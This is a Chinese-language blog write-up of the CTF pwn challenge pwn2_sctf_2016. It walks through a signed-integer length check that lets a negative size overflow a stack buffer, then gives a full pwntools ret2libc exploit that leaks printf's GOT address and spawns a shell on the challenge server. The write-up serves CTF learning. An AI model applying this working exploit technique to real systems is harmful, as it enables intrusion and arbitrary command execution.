加载头像

pwn2_sctf_2016

Ubuntu 16


0x01


checksec

1
2
3
4
5
6
[*] '/home/zelas/Desktop/pwn/pwn2_sctf_2016/pwn2_sctf_2016'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled //栈不可执行
PIE: No PIE (0x8048000)

IDA

vuln()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
int vuln()
{
char nptr[32]; // [esp+1Ch] [ebp-2Ch] BYREF
int v2; // [esp+3Ch] [ebp-Ch]

printf("How many bytes do you want me to read? ");
get_n(nptr, 4);
v2 = atoi(nptr); //v2为unsigned int ,这里输入一个负数
if ( v2 > 32 ) //
return printf("No! That size (%d) is too large!\n", v2);
printf("Ok, sounds good. Give me %u bytes of data!\n", v2);
get_n(nptr, v2);
return printf("You said: %s\n", nptr); //nptr溢出
}

get_n()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
int __cdecl get_n(int a1, unsigned int a2)
{
unsigned int v2; // eax
int result; // eax
char v4; // [esp+Bh] [ebp-Dh]
unsigned int i; // [esp+Ch] [ebp-Ch]

for ( i = 0; ; ++i )
{
v4 = getchar();
if ( !v4 || v4 == 10 || i >= a2 )
break;
v2 = i;
*(_BYTE *)(v2 + a1) = v4;
}
result = a1 + i;
*(_BYTE *)(a1 + i) = 0;
return result;
}

无system()

无bin_sh

0x02


思路 ret2libc

1.写入一个负数跳过第一个return

2.nptr溢出泄露printf()

3.LibcSearcher计算system()和/bin/sh地址

4.重新执行main(),再次溢出至system()

s 0x2C
rbp 0x4
ret printf()
printf() main()
arg printf_got
s 0x2C
rbp 0x4
ret system()
system_ret 0xdeadbeef
arg bin_sh

0x03


libc-2.23.so

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
from pwn import *
from LibcSearcher import *

context(log_level='debug', arch='i386', os='linux')
# io = process(['./pwn2_sctf_2016'])
io = remote('node4.buuoj.cn', 26225)
elf = ELF('./pwn2_sctf_2016')

io.sendline(b'-1')
io.recv()
padding = 0x2c + 0x4
fmt_str = 0x8048700
printf_plt = elf.plt['printf']
main = elf.symbols['main']
printf_got = elf.got['printf']
payload = flat(b'a' * padding, printf_plt, main, printf_got)
io.sendline(payload)
printf_addr = u32(io.recvuntil(b'\xf7')[-4:])
# gdb.attach(io)
print('[+] printf_addr ', hex(printf_addr))

# libc = LibcSearcher('printf', printf_addr)
# libc_base = printf_addr - libc.dump('printf')
# system = libc_base + libc.dump('system')
# bin_sh = libc_base + libc.dump('str_bin_sh')

libc = ELF('./libc-2.23.so')
libc_base = printf_addr - libc.symbols['printf']
system = libc_base + libc.symbols['system']
bin_sh = libc_base + libc.search(b'/bin/sh\x00').__next__()
print('[+] libc_base ', hex(libc_base))
print('[+] system_addr ', hex(system))
print('[+] bin_sh_addr ', hex(bin_sh))

io.sendlineafter(b'read?', b'-1')
ret_addr = 0x08048346
# payload1 = flat(b'a' * padding, ret_addr, system, 0xdeadbeef, bin_sh)
payload1 = flat(b'a' * padding, system, 0xdeadbeef, bin_sh)
io.sendlineafter(b'data!', payload1)
io.interactive()


评论
✅ 你无需删除空行,直接评论以获取最佳展示效果
引用到评论
随便逛逛博客分类文章标签
复制地址关闭热评深色模式轉為繁體